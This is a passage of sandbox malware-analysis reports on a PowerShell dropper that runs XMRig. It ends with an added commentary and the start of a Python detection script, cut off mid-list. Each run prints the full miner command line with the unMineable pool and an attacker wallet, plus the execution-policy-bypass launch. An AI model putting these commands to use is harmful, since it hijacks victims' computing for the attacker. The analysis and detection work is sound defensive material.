memory/3096-68-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-69-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-70-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win7-20240508-en
Max time kernel
120s
Max time network
125s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
Network
Files
memory/1452-4-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp
memory/1452-6-0x0000000001FC0000-0x0000000001FC8000-memory.dmp
memory/1452-5-0x000000001B810000-0x000000001BAF2000-memory.dmp
memory/1452-7-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1452-8-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1452-9-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1452-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1452-11-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1452-12-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
291s
Max time network
306s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2804 wrote to memory of 1564 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2804 wrote to memory of 1564 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
Files
memory/2804-3-0x00007FF931353000-0x00007FF931354000-memory.dmp
memory/2804-5-0x0000019CF5950000-0x0000019CF5972000-memory.dmp
memory/2804-8-0x0000019CF5B00000-0x0000019CF5B76000-memory.dmp
memory/2804-9-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cxcvikk2.vk1.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2804-22-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2804-25-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2804-29-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2804-30-0x00007FF931353000-0x00007FF931354000-memory.dmp
memory/2804-31-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2804-32-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2804-65-0x0000019CF5940000-0x0000019CF594A000-memory.dmp
memory/2804-52-0x0000019CF5AE0000-0x0000019CF5AF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1564-94-0x0000016BFC710000-0x0000016BFC730000-memory.dmp
memory/1564-95-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-96-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-97-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-98-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-99-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-100-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-101-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-102-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-103-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-104-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-105-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-106-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-107-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-108-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-109-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-110-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-111-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-112-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-113-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-114-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-115-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-116-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-117-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
300s
Max time network
265s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4600 wrote to memory of 4088 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4600 wrote to memory of 4088 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.121:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 121.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 |  | udp |
Files
memory/4600-0-0x00007FFE80DA3000-0x00007FFE80DA5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fnqvcxaz.slc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4600-10-0x00000178BE650000-0x00000178BE672000-memory.dmp
memory/4600-11-0x00007FFE80DA0000-0x00007FFE81861000-memory.dmp
memory/4600-12-0x00007FFE80DA0000-0x00007FFE81861000-memory.dmp
memory/4600-13-0x00007FFE80DA3000-0x00007FFE80DA5000-memory.dmp
memory/4600-14-0x00007FFE80DA0000-0x00007FFE81861000-memory.dmp
memory/4600-15-0x00007FFE80DA0000-0x00007FFE81861000-memory.dmp
memory/4600-17-0x00007FFE80DA0000-0x00007FFE81861000-memory.dmp
memory/4600-18-0x00000178BEA40000-0x00000178BEA52000-memory.dmp
memory/4600-19-0x00000178BEA20000-0x00000178BEA2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4088-50-0x000001C86A980000-0x000001C86A9A0000-memory.dmp
memory/4088-51-0x000001C86AAE0000-0x000001C86AB00000-memory.dmp
memory/4088-52-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-53-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-54-0x000001C86AB00000-0x000001C86AB20000-memory.dmp
memory/4088-55-0x000001C86AB20000-0x000001C86AB40000-memory.dmp
memory/4600-56-0x00007FFE80DA0000-0x00007FFE81861000-memory.dmp
memory/4088-57-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-58-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-59-0x000001C86AB00000-0x000001C86AB20000-memory.dmp
memory/4088-60-0x000001C86AB20000-0x000001C86AB40000-memory.dmp
memory/4088-61-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-62-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-63-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-64-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-65-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-66-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-67-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-68-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-69-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-70-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-71-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-72-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-73-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-74-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-75-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-76-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-77-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-78-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-79-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-80-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-81-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-82-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
299s
Max time network
262s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3092 wrote to memory of 684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3092 wrote to memory of 684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 52.111.227.14:443 |  | tcp |
Files
memory/3092-0-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp
memory/3092-6-0x0000024B70D40000-0x0000024B70D62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_riqwsc2u.sgx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3092-10-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/3092-11-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/3092-12-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/3092-13-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp
memory/3092-14-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/3092-15-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/3092-16-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/3092-18-0x0000024B70F30000-0x0000024B70F42000-memory.dmp
memory/3092-19-0x0000024B70F20000-0x0000024B70F2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/684-50-0x000001D2BCC30000-0x000001D2BCC50000-memory.dmp
memory/684-51-0x000001D2BCC70000-0x000001D2BCC90000-memory.dmp
memory/684-52-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-53-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-54-0x000001D2BCC90000-0x000001D2BCCB0000-memory.dmp
memory/684-55-0x000001D2BE560000-0x000001D2BE580000-memory.dmp
memory/684-56-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-57-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-58-0x000001D2BCC90000-0x000001D2BCCB0000-memory.dmp
memory/684-59-0x000001D2BE560000-0x000001D2BE580000-memory.dmp
memory/684-60-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-61-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-62-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-63-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-64-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-65-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-66-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-67-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-68-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-69-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-70-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-71-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-72-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-73-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-74-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-75-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-76-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-77-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-78-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-79-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-80-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-81-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
297s
Max time network
274s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(27 hits, none with a populated field)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5008 wrote to memory of 3308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5008 wrote to memory of 3308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
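The process pair above is the entire chain this report captures, and it repeats verbatim in every detonation: powershell.exe started with -ExecutionPolicy bypass on a dropped script, after which xmrig-6.21.3\xmrig.exe appears under %TEMP% (Executes dropped EXE) and is launched with its whole configuration on the command line (-a rx for RandomX, -o the stratum+ssl pool, -u the unMineable COIN:address.worker login, -p x). Everything a detection or a blocklist needs is therefore in the child's command line; the SeLockMemoryPrivilege requests logged under AdjustPrivilegeToken are XMRig asking for large pages for RandomX and are a second signal that does not depend on the image name. The Python below is an added example, not part of the sandbox report or of XMRig, that turns such process-creation events into structured indicators and keys the verdict on the stratum URL rather than on the file name. The events are constructed from this run's two command lines and PIDs; PowerShell's own parent PID is not in the report and is assumed to be 0.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample input: the two processes this report lists for behavioral2,
# as (pid, ppid, image, command line) the way a process-creation log carries them.
# PowerShell's own parent is not in the report; its ppid is set to 0 (assumption).
SAMPLE_EVENTS = [
    (5008, 0,
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
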